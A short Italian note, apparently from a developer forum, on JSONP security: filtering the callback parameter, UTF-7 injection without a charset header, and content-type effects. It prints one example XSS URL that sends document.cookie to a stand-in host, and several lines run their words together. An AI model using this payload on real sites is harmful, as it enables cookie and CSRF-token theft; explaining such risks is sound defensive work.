Il parametro callback potrebbe essere un vettore XSS
Ho trovato una risposta su stackoverflow che filtra la risposta callback JSONP. Questo è necessario perché il parametro callback può essere manipolato in un attacco XSS che ruba i token CSRF in questo modo:
http://yoursite.com/jsonp.php?callback=(function(){ $(document.body).append('<script type="text/javascript" src="http://badsite.com/?usercookies='+document.cookie+'"></script>');})//
LeiniezioniUTF7sonopossibiliseilsetdicaratterinonèincluso
Sel'intestazionenonèContent-Type:application/javascript;charset=utf-8
,leiniezioniUTF7sonopossibili.
Laselezionedeltipodicontenutopotrebbeavereunimpatto
Iltipodicontenuto influisce sulla compressione basata su HTTP di determinati host web condivisi.
C'è qualche differenza di funzionalità tra ciò che può essere fatto in alcuni browser in base al tipo di contenuto. Dovrò scavare i link da StackOverflow